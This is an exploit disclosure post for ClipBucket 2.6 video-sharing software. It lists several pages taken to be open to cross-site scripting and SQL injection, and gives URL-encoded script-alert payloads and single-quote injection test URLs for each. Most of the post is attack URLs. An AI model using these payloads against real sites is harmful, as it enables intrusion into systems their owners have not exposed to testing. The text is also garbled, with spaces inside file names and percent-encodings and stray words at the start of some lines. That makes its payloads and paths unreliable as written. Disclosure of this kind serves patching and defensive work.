Title: Multiple Vulnerability on ClipBucket 2.6
Author: YaDoY666
Develop this Website: http://yadoy666.serverisdown.org
Program: Clip Bucket (Open Source Video Sharing)
Affected Versions: 2.6
Cross Site Scripting
================================
[[=] Http://www.bkjia.com/[path]/channels. php
[[=] Http://www.bkjia.com/[path]/collections. php
[[=] Http://www.bkjia.com/[path]/groups. php
[[=] Http://www.bkjia.com/[path]/search_result.php
[[=] Http://www.bkjia.com/[path]/videos. php
[[=] Http://www.bkjia.com/[path]/view_collection.php
[[=] Http://www.bkjia.com/[path]/view_item.php
Example:
Http://www.bkjia.com/[path]/channels. php? Cat = % 27% 22% 28% 29% 26% 251% 3 CScRiPt % 20% 3 Ealert % 28% 27YaDoY666% 20Was % 20 Here % 27% 29% 3C % 2 fScRiPt % 3E & seo_cat_name = & sort = most_recent & time = all_time
Http://www.bkjia.com/[path]/collections. php? Cat = % 27% 22% 28% 29% 26% 251% 3 CScRiPt % 20% 3 Ealert % 28% 27YaDoY666% 20Was % 20 Here % 27% 29% 3C % 2 fScRiPt % 3E & seo_cat_name = & sort = most_recent & time = all_time
The http://www.bkjia.com/[path]/groups. php? Cat = % 27% 22% 28% 29% 26% 251% 3 CScRiPt % 20% 3 Ealert % 28% 27YaDoY666% 20Was % 20 Here % 27% 29% 3C % 2 fScRiPt % 3E & seo_cat_name = & sort = most_recent & time = all_time
Http://www.bkjia.com/[path]/search_result.php? Query = % 27% 22% 28% 29% 26% 251% 3 CScRiPt % 20% 3 Ealert % 28% 27YaDoY666% 20Was % 20 Here % 27% 29% 3C % 2 fScRiPt % 3E & submit = Search & type =
Http://www.bkjia.com/[path]/videos. php? Cat = % 27% 22% 28% 29% 26% 251% 3 CScRiPt % 20% 3 Ealert % 28% 27YaDoY666% 20Was % 20 Here % 27% 29% 3C % 2 fScRiPt % 3E & seo_cat_name = & sort = most_recent & time = all_time
A http://www.bkjia.com/[path]/view_collection.php? Cid = 9 & type = % 27% 22% 28% 29% 26% 3 CScRiPt % 251% 3 Ealert % 20% 27YaDoY666% 20Was % 20 Here % 28% 27% 3C % 2 fScRiPt % 3E
Http://www.bkjia.com/[path]/view_item.php? Collection = 9 & item = KWSWG7S983SY & type = % 27% 22% 28% 29% 26% 3 CScRiPt % 251% 3 Ealert % 20% 27YaDoY666% 20Was % 20 Here % 28% 27% 3C % 2 fScRiPt % 3E
SQL Injection
====================
[[=] Http://www.bkjia.com/[path]/channels. php
[[=] Http://www.bkjia.com/[path]/videos. php
Example test:
Http://www.bkjia.com/[path]/videos. php? Cat = all & seo_cat_name = & sort = most_recent & time = 1% 27
Http://www.bkjia.com/[path]/channels. php? Cat = all & seo_cat_name = & sort = most_recent & time = 1% 27